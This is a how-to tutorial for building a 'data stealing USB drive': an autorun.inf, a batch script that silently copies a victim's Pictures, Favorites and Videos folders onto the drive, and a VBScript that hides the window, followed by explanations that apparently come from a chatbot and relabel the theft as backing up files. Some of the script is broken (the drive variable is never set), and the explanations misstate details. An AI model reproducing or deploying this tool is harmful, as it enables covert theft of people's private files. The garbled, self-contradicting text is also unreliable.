How To Create Data Stealing USB Drive

STEP # 1
Open Notepad (I recommend Notepad++) and copy-paste the following lines.

[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat

Save this as autorun.inf

STEP # 2
Open Notepad again and copy-paste the following lines

@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\pictures" "%drive%\all\My pics"
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\all\Favorites"
%backupcmd% "%USERPROFILE%\videos" "%drive%\all\vids"
@echo off
cls

Save this as file.bat

STEP # 3
Open Notepad once again and copy-paste the following line.

CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

Save this as invisible.vbs

STEP # 4
Open Notepad one last time and copy-paste the following line.

wscript.exe \invisible.vbs file.bat

Save this as launch.bat

Step 1 detail:

autorun.inf file configuration for a removable drive like a USB flash drive. Let's break down what
each line does:

• [autorun]: This line defines the start of an autorun.inf section.

• icon=drive.ico: This line specifies the icon file (drive.ico) to be used for the drive when
displayed in File Explorer. Make sure drive.ico is present in the root directory of the drive.
• open=launch.bat: This line defines a program to be automatically launched when the drive is
inserted and accessed. In this case, it points to launch.bat.
• action=Click OK to Run: This line is used for informational purposes only. It defines the text
displayed in a confirmation dialog (if enabled in user settings) before running launch.bat.
However, modern operating systems often disable autorun functionality due to security
concerns.
• shell\open\command=launch.bat: This line achieves the same functionality
as open=launch.bat. It defines the command to be executed when the drive's shell folder is
opened (usually double-clicking the drive icon in File Explorer).

Step 2 detail:

Batch script command for backing up your Favorites folder. Here's a breakdown of what it does:

• %backupcmd%: This is a variable that likely holds the actual command used for copying files.
It's a common practice to define the command before using it to keep the script cleaner.
• "%USERPROFILE%\Favorites": This specifies the source folder. It uses environment
variables to represent the user's profile directory (%USERPROFILE%) and then points to the
Favorites folder within that directory.
• "%drive%\all\Favorites": This specifies the destination folder. It uses %drive% which could
represent a specific drive letter (e.g., D:, E:) or might need further definition in the script.
"all\Favorites" defines the folder name within the target drive where the backup will be stored.

However, for this script to work properly, you'd likely need the following:

1. Definition of %backupcmd%: The script assumes a variable named %backupcmd% is defined

earlier in the script containing the actual copy command. This command typically uses xcopy
with various flags to control the copy behavior. Common flags include:

• /s: Copy subfolders

• /c: Confirm overwrite for existing files
• /y: Overwrite existing files without confirmation
• /h: Copy hidden and system files

2. Drive availability: The script uses %drive% to represent the target drive. This variable might
need to be set explicitly in the script if it's not automatically assigned a letter.

Here are some alternative approaches for backing up your Favorites folder:

• Using the included backup tools: Windows offers built-in backup functionality. You can
access it through Control Panel -> System and Security -> Backup and Restore (Windows 7)
or Settings -> Update & Security -> Backup (Windows 10/11). These tools allow you to
schedule backups for various folders, including Favorites.
 • Third-party backup software: Many third-party backup applications offer more granular
control and scheduling options compared to built-in tools.

If you'd like to proceed with the script approach, you'll need to find the definition of %backupcmd% and
potentially modify it based on your desired copy behavior. It's generally recommended to be cautious
when running scripts that modify your files, so make sure you understand the script completely before
running it.

Here's a safer alternative approach:

1. Create a shortcut file named "Launch Program.lnk" in the root directory of the drive. This
shortcut can point to launch.bat within the drive.
2. Users can then manually double-click the shortcut to launch your program.

Remember, prioritize security and avoid using autorun unless necessary.

Step 3 detail:

This is a VBScript code snippet that executes a program or batch file invisibly. Here's a breakdown of
what it does:

• CreateObject("Wscript.Shell"): This line creates an object based on the Wscript.Shell

class. This class allows you to interact with the Windows shell, which includes running
programs and manipulating files.
• .Run(command, WindowStyle, WaitOnCompletion): This method of the Wscript.Shell
object executes a program or command.
o command: This is the string specifying the program or batch file to run.
o WindowStyle: This argument (set to 0 here) defines how the program window appears.
0 indicates a hidden window.
o WaitOnCompletion: This argument (set to False here) specifies whether the script
waits for the program to finish before continuing (False) or pauses until the program
finishes (True).
• """ & WScript.Arguments(0) & "": This part constructs the actual command to be executed.
o WScript.Arguments(0): This refers to the first argument passed to the VBScript script
when it's run. It's likely intended to hold the path to the program or batch file you want to
execute invisibly.
o The quotation marks (""" & """) around the argument ensure proper handling of spaces
or special characters potentially present in the program path.

How to Use This Code:

1. Save this code as a .vbs file (e.g., run_invisible.vbs).

2. When you want to run a program invisibly, open a command prompt and navigate to the
directory containing the .vbs file.
3. Execute the script along with the path to the program you want to run invisibly. Here's an
example: wscript run_invisible.vbs "C:\path\to\your\program.exe"

Important Considerations:
 • This code requires administrative privileges to run certain programs invisibly.
• Be cautious when running scripts from untrusted sources, as they could potentially execute
malicious programs.
• Consider alternative approaches for launching programs, such as creating shortcuts or using
built-in functionality within your program.

Step 4 detail:

The combination of wscript.exe invisible.vbs file.bat represents two parts working together:

1. wscript.exe invisible.vbs: This executes the invisible.vbs script using the wscript.exe
program, which is the Windows Script Host responsible for running VBScript files.
2. file.bat: This refers to a batch file named file.bat. The invisible.vbs script, when executed,
likely uses the WScript.Arguments(0) part to capture the path to file.bat passed as an
argument.

Here's how it works:

1. You run wscript.exe invisible.vbs file.bat from the command prompt.

2. wscript.exe executes the invisible.vbs script.
3. invisible.vbs retrieves the path to file.bat from WScript.Arguments(0).
4. The script likely uses the CreateObject("Wscript.Shell").Run method with the captured path
from file.bat to execute the batch file invisibly (hidden window).

Overall, this combination invisibly executes the batch file specified as the argument.

Here are some additional points to consider:

• Content of invisible.vbs: The actual behavior depends on the content within invisible.vbs.
It should contain the code to capture the argument and run the program
using CreateObject("Wscript.Shell").Run.
• Security Risk: Running scripts and batch files from untrusted sources can be risky. Make sure
you understand the contents of both invisible.vbs and file.bat before running them.
• Alternative Approaches: Consider alternative methods for running batch files, such as
double-clicking them directly or scheduling them through Task Scheduler.